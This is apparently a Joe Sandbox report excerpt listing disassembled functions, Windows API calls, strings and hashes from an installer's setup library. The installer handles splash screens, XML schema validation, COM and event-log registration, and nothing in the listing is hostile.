                                                                • Part of subcall function 6C915D3F: GetModuleFileNameW.KERNEL32(6C8F0000,00000010,00000104,?,6C94831D,00000000), ref: 6C915D93
                                                                • Part of subcall function 6C948E4A: PathAppendW.SHLWAPI(00000000,?,?,?,?,?,6C9599FD,00000000,00000000,?,?,?,00000000,?,UiInfo.xml), ref: 6C948E6E
                                                                • Part of subcall function 6C938EB8: CreateWindowExW.USER32(00000000,STATIC,00000000,0000000E,80000000,80000000,00000000,00000000,00000000,00000000,00000000), ref: 6C938F00
                                                                • Part of subcall function 6C938EB8: GetWindowLongW.USER32(?,000000F0), ref: 6C938F15
                                                                • Part of subcall function 6C938EB8: SetWindowLongW.USER32(?,000000F0,00000000), ref: 6C938F25
                                                                • Part of subcall function 6C938EB8: LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00000010), ref: 6C938F32
                                                                • Part of subcall function 6C938EB8: GetDesktopWindow.USER32 ref: 6C938F44
                                                                • Part of subcall function 6C938EB8: ShowWindow.USER32(?,00000001), ref: 6C938F57
                                                              • ShowWindow.USER32(?,00000005), ref: 6C938E4E
                                                              • UpdateWindow.USER32(?), ref: 6C938E57
                                                              • TranslateMessage.USER32(?), ref: 6C938E78
                                                              • DispatchMessageW.USER32(?), ref: 6C938E82
                                                              • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 6C938E8F
                                                              Strings
                                                              • Splash screen file '%s' not found, xrefs: 6C938E2F
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Window$H_prolog3Path$FileLongMessageShow$AppendCallbackCreateDesktopDispatchDispatcherExistsImageLoadModuleNameRelativeTranslateUpdateUser
                                                              • String ID: Splash screen file '%s' not found
                                                              • API String ID: 3262628749-2590370906
                                                              • Opcode ID: fa943dbb8826dfc4432888a0fb192a4afb10e7cb45874f5418b4c10d4cd7d7a1
                                                              • Instruction ID: 9da3e9b62a97c3b9637760c56d59a74fe53c8c63538ed7d114f4008a04a637bb
                                                              • Opcode Fuzzy Hash: fa943dbb8826dfc4432888a0fb192a4afb10e7cb45874f5418b4c10d4cd7d7a1
                                                              • Instruction Fuzzy Hash: 1421BF72A00219ABDF21ABB4CC04EDE7779BF25388F044516F421EBB90C734D914CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C91AC5F
                                                              • SysFreeString.OLEAUT32(?), ref: 6C91AD66
                                                              • SysAllocString.OLEAUT32(-00000010), ref: 6C91AE70
                                                              • __CxxThrowException@8.LIBCMT ref: 6C91AF3F
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C948CD5: __EH_prolog3.LIBCMT ref: 6C948CDC
                                                                • Part of subcall function 6C91838A: __EH_prolog3.LIBCMT ref: 6C918391
                                                                • Part of subcall function 6C918415: __EH_prolog3.LIBCMT ref: 6C91841C
                                                              Strings
                                                              • schema validation failure: ExpressionAlias's Id not defined or defined too many times: , xrefs: 6C91AEBF
                                                              • ExpressionAlias, xrefs: 6C91ACAC, 6C91ADEA
                                                              • //*[@Id='%s'], xrefs: 6C91AD26
                                                              • schema validation failure: Invalid ExpressionAlias or Id not found: , xrefs: 6C91AF84
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$String$AllocException@8FreeThrow
                                                              • String ID: //*[@Id='%s']$ExpressionAlias$schema validation failure: ExpressionAlias's Id not defined or defined too many times: $schema validation failure: Invalid ExpressionAlias or Id not found:
                                                              • API String ID: 191698298-1025498756
                                                              • Opcode ID: 66aa7b67b5940a2a59b484065c4e42992d1e094a82cbf0230d33bde3acbed4f2
                                                              • Instruction ID: 554108c0aacf8cbf3740b32604d38d9d0ab83e80bb143cba495886d2264c6056
                                                              • Opcode Fuzzy Hash: 66aa7b67b5940a2a59b484065c4e42992d1e094a82cbf0230d33bde3acbed4f2
                                                              • Instruction Fuzzy Hash: DFC14B71904249EFCB00DFE4C984AEEBBB9BF65308F244559E011EBB81DB35DA49CB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3_catch.LIBCMT ref: 6C95D44D
                                                              • GetCommandLineW.KERNEL32(0000006C,6C95B3B6,?,00000738,6C94FA6E,?,6C90A794,02642228), ref: 6C95D48E
                                                                • Part of subcall function 6C913E77: __EH_prolog3.LIBCMT ref: 6C913E7E
                                                                • Part of subcall function 6C913A16: __EH_prolog3.LIBCMT ref: 6C913A1D
                                                              • CoInitialize.OLE32(00000000), ref: 6C95D4EF
                                                              • CoUninitialize.OLE32(?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C95D6A9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$CommandH_prolog3_catchInitializeLineUninitialize
                                                              • String ID: Hide$SplashScreen$UiInfo.xml$nosplashscreen
                                                              • API String ID: 1338294413-2964427009
                                                              • Opcode ID: f905cf2f81d66d958189d25e38bda9fd0aba5239e302c3d11de72feaa05eaee4
                                                              • Instruction ID: e0f48a19465fc8520b10c3ec918730da7261f273e23f8ce934a7c5a551b01db8
                                                              • Opcode Fuzzy Hash: f905cf2f81d66d958189d25e38bda9fd0aba5239e302c3d11de72feaa05eaee4
                                                              • Instruction Fuzzy Hash: 57819D71904248DBDF00DFE8C945BDEBBB8AF25308F144199E414EBB81CB35DA1ACBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C919C41
                                                              • __CxxThrowException@8.LIBCMT ref: 6C919D24
                                                              • __fassign.LIBCMT ref: 6C919D58
                                                              • _wcstoul.LIBCMT ref: 6C919D65
                                                                • Part of subcall function 6C96B6D0: wcstoxl.LIBCMT ref: 6C96B6E0
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C91838A: __EH_prolog3.LIBCMT ref: 6C918391
                                                              • __get_errno.LIBCMT ref: 6C919D74
                                                              Strings
                                                              • ", xrefs: 6C919D88
                                                              • schema validation failure: empty value, %s, for %s, xrefs: 6C919CA1
                                                              • schema validation failure: non-numeric value, %s, for %s, xrefs: 6C919DB1
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8Throw__fassign__get_errno_wcstoulwcstoxl
                                                              • String ID: "$schema validation failure: empty value, %s, for %s$schema validation failure: non-numeric value, %s, for %s
                                                              • API String ID: 2631245360-326575430
                                                              • Opcode ID: 2ae485d946700e8011c273b5ff1a53c84027add438b5ae14e990a632680709f3
                                                              • Instruction ID: b8954a45a34eb9db4ae2e006c3ac2fb827ab60ed091d3f24cd360166ff3087bb
                                                              • Opcode Fuzzy Hash: 2ae485d946700e8011c273b5ff1a53c84027add438b5ae14e990a632680709f3
                                                              • Instruction Fuzzy Hash: 76618F71904149EFDF04DFE8C8859EEBBB8BF25318F14855AF011ABA81DB34DA09CB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C48DC06
                                                                • Part of subcall function 6C48D923: __EH_prolog3.LIBCMT ref: 6C48D92A
                                                                • Part of subcall function 6C48D923: PathIsRelativeW.SHLWAPI(00000000,00000000,?,00000000,00000008,6C49E271,00000000,?,?,00000DF0,?,?), ref: 6C48D960
                                                                • Part of subcall function 6C48D923: GetModuleFileNameW.KERNEL32(00000010,00000104,?,00000000,00000008,6C49E271,00000000,?,?,00000DF0,?,?), ref: 6C48D9BA
                                                                • Part of subcall function 6C48D923: PathCombineW.SHLWAPI(?,?,?,00000000,?,00000000,00000008,6C49E271,00000000,?,?,00000DF0,?,?), ref: 6C48DA0D
                                                              • CoCreateInstance.OLE32(6C487930,00000000,00000017,6C487970,?,?,?,?,00000030,6C4962D8), ref: 6C48DC48
                                                              • SysFreeString.OLEAUT32(?), ref: 6C48DC69
                                                                • Part of subcall function 6C49E8E8: __EH_prolog3.LIBCMT ref: 6C49E8EF
                                                                • Part of subcall function 6C48DE1D: __EH_prolog3.LIBCMT ref: 6C48DE24
                                                                • Part of subcall function 6C48DE1D: SysFreeString.OLEAUT32(00000000), ref: 6C48DE6B
                                                                • Part of subcall function 6C48CA39: __EH_prolog3.LIBCMT ref: 6C48CA40
                                                                • Part of subcall function 6C48CAC2: __EH_prolog3.LIBCMT ref: 6C48CAC9
                                                              • __CxxThrowException@8.LIBCMT ref: 6C48DD4B
                                                              • SysFreeString.OLEAUT32(?), ref: 6C48DD87
                                                                • Part of subcall function 6C48B93E: __EH_prolog3.LIBCMT ref: 6C48B945
                                                              Strings
                                                              • m_spDoc->get_documentElement() failed. Parse error is: %s, xrefs: 6C48DD19
                                                              • CoCreateInstance(__uuidof(DOMDocument30)) failed with hr=%d, xrefs: 6C48DC58
                                                              • m_spDoc->loadXML() failed. Parse error is: %s, xrefs: 6C48DDFE
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$FreeString$Path$CombineCreateException@8FileInstanceModuleNameRelativeThrow
                                                              • String ID: CoCreateInstance(__uuidof(DOMDocument30)) failed with hr=%d$m_spDoc->get_documentElement() failed. Parse error is: %s$m_spDoc->loadXML() failed. Parse error is: %s
                                                              • API String ID: 3627190661-2525052916
                                                              • Opcode ID: 06512d0ecd5bcb0522dd2401b1875202f870f709546aac25240a1b57bd38716a
                                                              • Instruction ID: 8c05ce82fb132ce5f1d81e57c7bc89fb13609566d91fe499e596bdeaadc26651
                                                              • Opcode Fuzzy Hash: 06512d0ecd5bcb0522dd2401b1875202f870f709546aac25240a1b57bd38716a
                                                              • Instruction Fuzzy Hash: 1E616072902149EFDB00DBE8C884EEEBBB8AF19308F14455EF150A7791D774DA498BA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 6C934510
                                                              • __EH_prolog3.LIBCMT ref: 6C934689
                                                                • Part of subcall function 6C94FF21: _wcsnlen.LIBCMT ref: 6C94FF54
                                                                • Part of subcall function 6C94FF21: _memcpy_s.LIBCMT ref: 6C94FF8A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3H_prolog3__memcpy_s_wcsnlen
                                                              • String ID: #(loc.$&amp;$&apos;$&gt;$&lt;$&quot;
                                                              • API String ID: 1381108809-1774302600
                                                              • Opcode ID: a3b447e6691104f3e0011f48ec2441c33f5ae50a26cd8d6abcd3975a0377923d
                                                              • Instruction ID: 366328b13747a10e0cbd99609f03eb474b3b02851bb3305688419e0e3cf46264
                                                              • Opcode Fuzzy Hash: a3b447e6691104f3e0011f48ec2441c33f5ae50a26cd8d6abcd3975a0377923d
                                                              • Instruction Fuzzy Hash: 12516C71A002089FDB00DFE8C845AEDB7B5BF29318F10455AE410EBB90DB35DA19CBA9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3_catch.LIBCMT ref: 6C9451C7
                                                              • CoInitialize.OLE32(00000000), ref: 6C9451DC
                                                                • Part of subcall function 6C968859: SysStringByteLen.OLEAUT32(00000000), ref: 6C968860
                                                                • Part of subcall function 6C968859: SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 6C968869
                                                                • Part of subcall function 6C91B00D: __EH_prolog3.LIBCMT ref: 6C91B014
                                                                • Part of subcall function 6C91B00D: SysFreeString.OLEAUT32(?), ref: 6C91B044
                                                              • CoUninitialize.OLE32(?,?,?,00000000,?,?,?,?,?,ParameterInfo.xml,?,00000000,?,?,ParameterInfo.xml), ref: 6C945389
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C91A6DB: __EH_prolog3.LIBCMT ref: 6C91A6E2
                                                                • Part of subcall function 6C91A6DB: SysFreeString.OLEAUT32(?), ref: 6C91A72B
                                                                • Part of subcall function 6C91A7C3: __EH_prolog3.LIBCMT ref: 6C91A7CA
                                                              • __CxxThrowException@8.LIBCMT ref: 6C945343
                                                              Strings
                                                              • #(loc., xrefs: 6C9452B7
                                                              • ParameterInfo.xml, xrefs: 6C9452FE
                                                              • //BlockIf[@ID], xrefs: 6C945218
                                                              • BlockIf/@ID cannot contain any token (#(loc.[Name]) references. BlockIf/@ID=", xrefs: 6C9452CB
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3String$ByteFree$AllocException@8H_prolog3_catchInitializeThrowUninitialize
                                                              • String ID: #(loc.$//BlockIf[@ID]$BlockIf/@ID cannot contain any token (#(loc.[Name]) references. BlockIf/@ID="$ParameterInfo.xml
                                                              • API String ID: 3727013976-3244902561
                                                              • Opcode ID: 98a130b733b4266212a6d09affa32c0867ed2987a68c5fe8b7963352ff3cc34b
                                                              • Instruction ID: 5739b945d6d8f0255ca387ce5d4f0dae30a71f647f753cd7eb286f8faa294696
                                                              • Opcode Fuzzy Hash: 98a130b733b4266212a6d09affa32c0867ed2987a68c5fe8b7963352ff3cc34b
                                                              • Instruction Fuzzy Hash: D2518371D0414CDFCB04DBE8C984ADDBBB9AF25318F148559E125E7B80CB34DA4ACB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3_catch.LIBCMT ref: 6C9250DC
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C948380: __EH_prolog3.LIBCMT ref: 6C948387
                                                                • Part of subcall function 6C91388B: __EH_prolog3.LIBCMT ref: 6C913892
                                                              • CoInitialize.OLE32(00000000), ref: 6C92512A
                                                              • CoCreateInstance.OLE32(6C90A974,00000000,00000017,6C90A9A4,00000738,?,?,?,00000000,?,?,?,512AC3CC,?,?,?), ref: 6C925148
                                                              • __CxxThrowException@8.LIBCMT ref: 6C925270
                                                                • Part of subcall function 6C9254B1: __EH_prolog3.LIBCMT ref: 6C9254B8
                                                                • Part of subcall function 6C9254B1: __CxxThrowException@8.LIBCMT ref: 6C925540
                                                              • CoUninitialize.OLE32(02642228,?,succeeded,?,?,?,00000000,?,?,?,512AC3CC,?,?,?), ref: 6C9251E6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8Throw$CreateH_prolog3_catchInitializeInstanceUninitialize
                                                              • String ID: IronMan::LocalizedData::CreateLocalizedData$succeeded$threw exception
                                                              • API String ID: 4097945976-352736096
                                                              • Opcode ID: dec8593c036ee750f1f520ad5445c1fd8f41e1c39c2aa5aa30c20a67b2d4925b
                                                              • Instruction ID: 43142dd5408a699e47e9310da72ef05013bdcef963ea0cefdf1fd89af7a2f764
                                                              • Opcode Fuzzy Hash: dec8593c036ee750f1f520ad5445c1fd8f41e1c39c2aa5aa30c20a67b2d4925b
                                                              • Instruction Fuzzy Hash: F6516D70A0124DEFCB01CFA4C884EDE7BB9AF69318F148549F115EBA95C734DA45CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • RegOpenKeyExW.KERNEL32(80000002,System\CurrentControlSet\Services\Eventlog\Application\VSSetup,00000000,00020019,?,?,6C94831D,00000000), ref: 6C9177E8
                                                              • RegCreateKeyExW.KERNEL32(80000002,System\CurrentControlSet\Services\Eventlog\Application\VSSetup,00000000,00000000,00000000,00020006,00000000,?,00000000,?,6C94831D,00000000), ref: 6C917805
                                                                • Part of subcall function 6C91787B: __EH_prolog3.LIBCMT ref: 6C917882
                                                                • Part of subcall function 6C91787B: RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\PCHealth\ErrorReporting\DW\Installed,00000000,00020019,?,00000014,6C91781A,?,6C94831D,00000000), ref: 6C9178B2
                                                                • Part of subcall function 6C91787B: RegQueryValueExW.ADVAPI32(?,DW0200,00000000,00000000,?,?,?,6C94831D,00000000), ref: 6C9178D8
                                                                • Part of subcall function 6C91787B: RegCloseKey.ADVAPI32(?,?,6C94831D,00000000), ref: 6C9178E4
                                                                • Part of subcall function 6C91787B: GetFileAttributesW.KERNEL32(?,?,6C94831D,00000000), ref: 6C9178F9
                                                              • RegSetValueExW.KERNEL32(?,EventMessageFile,00000000,00000002,?,00000208,?,6C94831D,00000000), ref: 6C917836
                                                              • RegSetValueExW.KERNEL32(?,TypesSupported,00000000,00000004,?,00000004,?,6C94831D,00000000), ref: 6C917859
                                                              • RegCloseKey.KERNEL32(?,?,6C94831D,00000000), ref: 6C917861
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Value$CloseOpen$AttributesCreateFileH_prolog3Query
                                                              • String ID: EventMessageFile$System\CurrentControlSet\Services\Eventlog\Application\VSSetup$TypesSupported
                                                              • API String ID: 4021642227-369282485
                                                              • Opcode ID: e0b9e7d1cc4821b49794f2d50183b17a9617176aa1bc5c9ad059eb9eb1ea6e69
                                                              • Instruction ID: 66ec309fc4d0d06bfb77fb03e21889046ee999c6c5e1b61314499d3dccb6f6e9
                                                              • Opcode Fuzzy Hash: e0b9e7d1cc4821b49794f2d50183b17a9617176aa1bc5c9ad059eb9eb1ea6e69
                                                              • Instruction Fuzzy Hash: AE1198B164122CBBDB309B52DC8DFEBBF7DEF95794F4004A5B52CA2540C6709E44DAA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetStartupInfoW.KERNEL32(?,6C96C0C9), ref: 6C96DB0F
                                                              • __calloc_crt.LIBCMT ref: 6C96DB1B
                                                                • Part of subcall function 6C96D761: Sleep.KERNEL32(00000000,?,6C96C0C9,6C94F845,00000C00,00000020,6C94F845,?), ref: 6C96D789
                                                              • __calloc_crt.LIBCMT ref: 6C96DBBB
                                                              • GetFileType.KERNEL32(?,00000001,6C96C0C9), ref: 6C96DC42
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: __calloc_crt$FileInfoSleepStartupType
                                                              • String ID:
                                                              • API String ID: 591920814-0
                                                              • Opcode ID: 5b1da16e93de55a24ef522f83c467984e70bd2472e112fe33efcf4a9f9e223f7
                                                              • Instruction ID: 8ec7510c81da9601f51d2c69a6bf7098d84342c67b925d43b061d3c8bb117f2f
                                                              • Opcode Fuzzy Hash: 5b1da16e93de55a24ef522f83c467984e70bd2472e112fe33efcf4a9f9e223f7
                                                              • Instruction Fuzzy Hash: F8611DB2A093058FE7108FAAC888B197BB4AF56328F364668C576CBFD1E775D405CB40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetStartupInfoW.KERNEL32(6C4814A0,6C4A91D6), ref: 6C4AA31E
                                                              • __calloc_crt.LIBCMT ref: 6C4AA32A
                                                                • Part of subcall function 6C4A9F70: Sleep.KERNEL32(00000000,?,6C4A91D6,?), ref: 6C4A9F98
                                                              • __calloc_crt.LIBCMT ref: 6C4AA3CA
                                                              • GetFileType.KERNEL32(74C08559,00000001,6C4A91D6), ref: 6C4AA451
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: __calloc_crt$FileInfoSleepStartupType
                                                              • String ID:
                                                              • API String ID: 591920814-0
                                                              • Opcode ID: 841241bdeccea425817de42a8113a2f3073abe3532ffacacb65aaf76273fe323
                                                              • Instruction ID: 94b256c09a0807835f1076a1cfcf1ba0ebaca6903ba29d2fd867c1f21e38b48c
                                                              • Opcode Fuzzy Hash: 841241bdeccea425817de42a8113a2f3073abe3532ffacacb65aaf76273fe323
                                                              • Instruction Fuzzy Hash: FD610171A093018FD700CBA9C888F697BB4AF66339F244768E5669B6E5D330D806CF45
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C91B326
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C91B25F: __EH_prolog3.LIBCMT ref: 6C91B266
                                                              • __CxxThrowException@8.LIBCMT ref: 6C91B5A8
                                                              Strings
                                                              • The DisabledCommandLineSwitches block has no CommandLineSwitches specified - either add them or remove the DisabledCommandLineSwit, xrefs: 6C91B546
                                                              • No DisabledCommandLineSwitches block was specified, xrefs: 6C91B5C8
                                                              • DisabledCommandLineSwitches, xrefs: 6C91B353
                                                              • ParameterInfo.xml, xrefs: 6C91B554
                                                              • Disabled CommandLineSwitch added: , xrefs: 6C91B406, 6C91B4C5
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
